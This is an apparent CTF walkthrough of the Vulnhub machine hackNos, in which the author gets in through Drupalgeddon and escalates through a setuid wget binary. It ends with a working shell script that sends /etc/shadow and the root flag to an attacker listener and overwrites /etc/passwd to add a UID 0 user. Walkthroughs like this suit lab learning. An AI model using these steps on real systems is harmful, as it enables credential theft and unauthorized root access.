hackNos: Os-hackNos Walkthrough

It's been a while since I've played on Vulnhub and there are a ton of new machines.  In fact, I just saw a stat that showed this is the first year where there have been over 100 submissions.  I guess I've got a lot of catching up to do -- or not.  Anyway, it's the holiday weekend and I have some time to kill so I went to see what was new and hackNos is one of the first few.

This box is fairly straightforward as long as you don't get bogged down on any particular avenue.  It's also possible to get the root flag without actually becoming root but I couldn't let that stand so I rooted it as well.  More on that in a moment. 

First, we kick off with Nmap:

Not much here; port 80 is our likely entry point.

Just to make sure we're covering all our bases, we toss the FQDN and IP into our hosts file. 

We move to the web:

The stock Apache page. 

Let's see what Gobuster can uncover:

Drupal! 

Let's see what the web has to offer:

Scanning with Droopescan:

I'm pretty sure this version is vulnerable to Drupalgeddon:

Firing up Metasploit, we get our low-privilege shell.

Moving to the command line and cleaning up the environment:

Searching around, we find the home directory for James and the user flag.  We also see that James can run sudo su:

Checking out the web directory, we find a random file:

That appears to be base64-encoded; let's decode it:

I've seen this type of output but I can't recall exactly what it's called. 

More on that in a moment.  First, let's get the Drupal DB credentials:

And the hashes in MySQL:

I try to make some use of those credentials but don't get anywhere. 

Moving back to the encoded nonsense:

When we decode, we get:

That's a red herring or something didn't work as planned.  I assume the former because I couldn't login as James with that password. 

Moving along...

Performing our typical enumeration, we uncover an unusual setuid binary:

Because wget is setuid root, every file it opens is opened with root's privileges.  That gives us two primitives: with --post-file we can read any file (it is sent as the body of an HTTP POST to a listener we control), and with -O we can write any file (the response body is written to the path we name).  Read the shadow file, read the root flag, or overwrite /etc/passwd; it's all the same binary.

First, let's get the shadow file:

With our handler set up:

No luck on cracking those with hashcat.

As I mentioned, if the goal is to read the root flag, we can do that without getting root:

With our handler set up:

Technically, that's game over, but I'm not happy with that ending.  To get a proper root, we can replace the passwd file.  First, we need to generate a password hash for the new entry:

Starting from a copy of the existing passwd file (so nothing already on the box gets lost), we append a new UID 0 entry as the bottom line, carrying our newly created hash:

After hosting that file somewhere we can retrieve it with wget:

We replace the file, su to our new user, and we're root.  Once again, we read the root flag, this time for a proper root.
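For reference, here are the setuid-wget steps from this walkthrough (exfiltrating shadow and the root flag, then overwriting passwd) wrapped up as shell functions, plus the sanity check I'd want before pushing a new passwd file, since a malformed one locks out everyone including us.  This is an added example, not the commands from the original screenshots: the attacker address 10.10.10.1, the listener port 8000, the file-server port 8080, the path /usr/bin/wget and the user name evil are all hypothetical.

```shell
#!/bin/sh
# Added example: setuid wget primitives as used in the walkthrough.
# All names and addresses below are hypothetical and can be overridden
# via the environment.
ATTACKER="${ATTACKER:-10.10.10.1}"   # attacker IP (assumption)
WGET="${WGET:-/usr/bin/wget}"        # the setuid binary (assumption)

# Read a root-only file: --post-file makes setuid wget open the file as
# root and POST its raw contents to our listener.
# On the attacker: nc -lvnp 8000   (the body is the file)
exfil_file() {
    "$WGET" -q --post-file="$1" "http://$ATTACKER:8000/" -O /dev/null
}

# Write a file as root: -O writes the response body to the given path.
# On the attacker, serve the payload verbatim: python3 -m http.server 8080
overwrite_file() {
    "$WGET" -q "http://$ATTACKER:8080/$1" -O "$2"
}

# Build a passwd line for a second UID 0 user. $2 is a crypt(3) hash,
# e.g. the output of: openssl passwd -1 'Password1'
root_entry() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# Sanity-check a candidate passwd file before it replaces /etc/passwd:
# every line must have exactly seven colon-separated fields, a non-empty
# user name and numeric uid/gid, and the original root line must survive.
# Returns 0 if the file is usable, 1 otherwise.
check_passwd() {
    awk -F: '
        NF != 7 || $1 == "" || $3 !~ /^[0-9]+$/ || $4 !~ /^[0-9]+$/ { bad = 1 }
        $1 == "root" && $3 == 0 { have_root = 1 }
        END { exit ((bad || !have_root) ? 1 : 0) }
    ' "$1"
}

# Full flow as in the post (run the first two from the victim, the rest
# on the attacker, then the last two from the victim again):
#   exfil_file /etc/shadow            # hashes for offline cracking
#   exfil_file /root/root.txt         # the flag, no root shell needed
#   exfil_file /etc/passwd            # save the POST body as ./passwd
#   root_entry evil "$HASH" >> passwd && check_passwd passwd
#   overwrite_file passwd /etc/passwd
#   su evil                           # and we are root
```

The check matters because wget -O truncates the target before writing, so a half-served or mangled passwd file leaves the box with no valid accounts at all; run it against the assembled file on the attacker before serving it.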